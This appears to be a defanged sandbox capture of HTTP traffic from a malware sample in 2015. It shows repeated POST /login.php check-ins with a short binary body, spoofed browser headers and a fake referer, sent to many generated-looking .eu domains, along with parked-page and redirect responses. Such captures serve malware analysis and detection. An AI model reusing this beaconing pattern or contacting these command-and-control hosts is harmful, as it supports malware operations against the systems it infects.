User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:21 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu

19..Landed nojejecebuw.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vofozymufok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/vofozymufok.eu

Set-Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.vocakemenir.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:33 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>vocakemenir.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'vocakemenir.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0OS40NzY2OmM4MTZkOGU2M2E1MDlhZjBiNzgzYjEzODk2NDA4ZDk0OWE3MGUzYWFmOTM2NDEzZmZiZDlkNjI3ZjZhYzk4Y2Y6NTY0ZWUzMzU3NDYxNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzNTcyYmE1fHx8MTQ0ODAxMDU0OS40ODI3fGE3MjY1Y2MxYjYwYzJkYzRjNjEzNzA3ZmExMzZmOTk5ODg0MTA1MGN8fHx8fDF8fHwwfDU2NGVlMzM1MTM1MzVmM2E0MThiNTAwYXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.qetuluvolos.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:14 GMT

Server: Apache

Set-Cookie: vsid=914vr1955561546911765; expires=Wed, 18-Nov-2020 09:09:14 GMT; path=/; domain=ww92.qetuluvolos.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqYVKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=93

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqYVKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qetuluvolos.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qetuluvolos.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qetuluvolos.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qetuluvolos.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

GET /1acef55da687a834a563e6c7f72341c6 HTTP/1.1

Host: xsso.kemocujufys.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu

19..Landed kemocujufys.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.pupujeguper.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:29 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>pupujeguper.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'pupujeguper.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NS4wNTQ3OjQyZjQwZTBkYTEyMWMwNTJmNzFiYmZjNzQ4YWU4M2Q3NzUwMWRlMmU1Y2U1ZmVjNjMyMDc4MjAyN2Q2OTUzNGU6NTY0ZWUzMzEwZDY1ZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMzMDdlNzc5fHx8MTQ0ODAxMDU0NS4wNjMxfGM4Y2RlZmIxNWYyMWNhM2EwNTI1M2YwNzUyM2QwMzg1ZDViMmU1NjR8fHx8fDF8fHwwfDU2NGVlMzMxODhmYmNlNjA5MjhiNGEzMnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryhuzilywax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:40 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.ryhuzilywax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:40 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.ryhuzilywax.eu..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryhuzilywax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:42 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.ryhuzilywax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:42 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.ryhuzilywax.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kevedorozup.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.kevedorozup.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.kevedorozup.eu..Vary: Accept-Encoding..

GET /domain/nopegymozow.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu

Location: hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65

3e..Go hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.digusebyvad.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:19:08 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>digusebyvad.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'digusebyvad.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU4NC43Nzg2OjQzYzZiNDhjNDEyMjdkMTVkYzM3MTkyYzYwYmRiZGFjYWZiZDQzMTA5MDk2NmEzOWM3Y2IyNmM0ZTJmOWM3YjA6NTY0ZWUzNThiZTE4Yg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1OGJjZTBhfHx8MTQ0ODAxMDU4NC43ODIyfDAxOWQ2MDBhYmU5MmRhM2Y2ODc2YjA3ZWEyZDkzMzYyYWJhNTYwZmV8fHx8fDF8fHwwfDU2NGVlMzU4MWQzNTNkZTAwOThiNWYxNXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

GET /56531f80c1f00a0d974859702a1ece40 HTTP/1.1

Host: xsso.fodakyhijyv.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu

19..Landed fodakyhijyv.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: puregivytoh.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:33 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.puregivytoh.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:33 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.puregivytoh.eu..Vary: Accept-Encoding..

GET /domain/ciliqikytec.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu

Location: hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38

3e..Go hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.qexofyqihid.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:07 GMT

Server: Apache

Set-Cookie: vsid=923vr1955561476019761; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.qexofyqihid.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=46

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qexofyqihid.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qexofyqihid.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvejujolec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/lyvejujolec.eu

Set-Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pupujeguper.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.pupujeguper.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.pupujeguper.eu..Vary: Accept-Encoding..

GET /519227042aaa4d45b3d8d04c6d6182c2 HTTP/1.1

Host: xsso.vofozymufok.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu

19..Landed vofozymufok.eu<br>..0..

GET /bd3d82839c544969cd7e5b6b151fa69e HTTP/1.1

Host: xsso.qeqinuqypoq.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu

19..Landed qeqinuqypoq.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xugiqonenuz.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 200 OK

Connection: close

Set-Cookie: jsessionid=909bfe917d8125c576546cf2675a42ec; Expires=Fri, 18 Nov 2022 09:09:18 GMT

Date: Fri, 20 Nov 2015 09:09:18 GMT

Content-Length: 0

Content-Type: text/plain; charset=utf-8

GET /domain/lyvejujolec.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu

Location: hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8

3e..Go hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekikyvutic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:48 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.qekikyvutic.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:48 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.qekikyvutic.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: keraborigin.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:43 GMT

Server: Apache/2.4.7 (Ubuntu)

Content-Length: 286

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>.....

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: keraborigin.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:43 GMT

Server: Apache/2.4.7 (Ubuntu)

Content-Length: 286

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 20 Nov 2015 09:09:43 GMT..Server: Apache/2.4.7 (Ubuntu)..Content-Length: 286..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>...

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

